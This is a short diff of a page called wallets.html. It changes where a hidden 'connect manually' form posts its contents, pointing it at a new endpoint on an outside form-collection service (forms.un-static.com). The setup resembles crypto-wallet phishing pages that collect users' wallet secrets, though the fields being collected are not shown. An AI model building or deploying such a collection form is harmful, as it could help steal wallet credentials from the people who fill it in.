--- a/wallets.html
+++ b/wallets.html
@@ -1338,7 +1338,8 @@
                 </form> -->
 
                     <div id="div_connect_manuallly" style="display:none;">
-                        <form action="https://forms.un-static.com/forms/50631007ca97aca47e6debe3d8e78d1631bcfa6e" method="POST" id="my-form">
+                        <form action="
+                        https://forms.un-static.com/forms/ce738409b3c9b28ee4ac0887eb3fd9fb0b1912ae" method="POST" id="my-form">
                             <input
                             type="hidden"
                             name="_redirect"
